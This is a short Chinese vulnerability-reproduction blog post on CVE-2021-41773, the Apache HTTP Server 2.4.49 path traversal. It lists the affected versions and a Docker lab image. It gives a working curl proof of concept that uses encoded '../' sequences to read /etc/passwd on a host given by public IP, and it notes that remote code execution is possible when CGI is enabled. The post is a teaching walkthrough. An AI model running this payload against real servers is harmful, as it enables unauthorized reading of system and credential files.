常见中间件漏洞复现之【Apache】!

CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件
在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
--------------------

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
-------------------

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
-------------------

漏洞复现

打开网页

使用poc

复制代码
curl http://1.15.136.212:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
相关推荐
程序员清风2 小时前
PydanticAI 实战:用类型安全构建可靠的 Python Agent
开发语言·python·安全
林伽一3 小时前
100 万输出词元与窄开放,前沿模型发布范式正在改写|2026年10月02日
人工智能·科技·安全·ai
悟天特斯4 小时前
安防一体化:从“孤岛式监控“到“全域联动“的楼宇安全体系
人工智能·安全
ccstuck5 小时前
AI安全系列:给最小 Agent 做提示注入测试
人工智能·安全·ai安全
赛博守夜人6 小时前
跨境业务与出海合规之三:母公司如何通过 IT 权限与财权 Token 实现穿透式管控?
安全
小小小小钰儿7 小时前
2.3-云端API集成
人工智能·计算机·网络安全·操作系统·编程
姜鱼问生8 小时前
uptime-kuma 从 docker run 迁移到 compose:数据卷的坑
安全·架构
白帽攻防录8 小时前
SRC 挖洞:Dgraph GraphQL 数据库注入深度复盘,CVE-2026-41328 两个请求拖走全库数据
网络安全·graphql
Bruce_Liuxiaowei10 小时前
2026年10月第1周网络安全形势周报
安全·web安全
小小小小钰儿10 小时前
2.2-模型微调
人工智能·深度学习·机器学习·计算机·网络安全·操作系统·编程